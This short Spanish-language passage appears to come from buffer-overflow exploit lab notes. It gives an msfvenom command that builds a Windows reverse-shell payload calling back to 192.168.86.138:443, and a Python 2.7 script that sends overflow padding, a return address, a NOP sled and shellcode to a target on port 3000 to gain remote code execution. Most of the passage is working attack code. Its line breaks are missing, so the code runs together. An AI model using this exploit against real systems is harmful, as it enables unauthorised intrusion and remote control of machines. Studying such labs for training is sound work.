# Los BadChars se especifican despues del -bmsfvenom-pwindows/shell_reverse_tcpLHOST=192.168.86.138LPORT=443EXITFUNC=thread-fc-ax86-b"\x00"
El script final para RCE es:
#!/usr/bin/python2.7import sys, socketoverflow = ("Resultado msfvenom")# \xAF\x11\x50\x62 Este valor le sigue al OFFSET# x90"*32 son valores por defectoshellcode ="A"* VALOR_DEL_OFFSET +"\xAF\x11\x50\x62"+"\x90"*32+ overflowwhileTrue:try: s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('10.10.10.111',3000)) s.send(('FUNCION /.:/'+ shellcode)) s.close()except:print"Server error" sys.exit()